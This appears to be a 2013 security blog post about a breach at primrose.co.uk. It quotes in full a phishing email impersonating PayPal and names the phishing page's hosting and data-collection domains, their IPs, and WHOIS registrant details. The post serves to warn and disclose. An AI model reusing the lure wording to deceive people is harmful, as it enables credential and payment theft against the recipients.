Sponsored by..

Thursday 18 July 2013

primrose.co.uk hacked, email addresses compromised

Garden accessory primrose.co.uk has been hacked, and email addresses stored in their system are being abused for phishing purposes:

From:     paypal.co.uk [service@paypal.co.uk]
Date:     18 July 2013 11:01
Subject:     We cannot process your payment at this time.

   
Dear,

We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ?

It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.

Reference Number: PP-001-278-254-803

It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.

1.
    Download the attached document and open it in a browser window secure.
2.
    Confirm that you are the account holder and follow the instructions.

Yours sincerely,
PayPal
   

Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589

The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www.thesenddirect.com  (62.149.142.113 - Aruba, Italy) and submitting the data to www.paypserv.com (62.149.142.152 - also Aruba). The WHOIS details are no doubt fake are are respectively:

Saunders, John Alan  mahibarayanlol@gmail.com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
IT
+39.447885623455

----------

Clarke, Victoria  johanjo1010@gmail.com
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
IT
+39.441934862064


Primrose.co.uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything.

Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose.co.uk it is impossible to say if any financial data has been compromised.

No comments: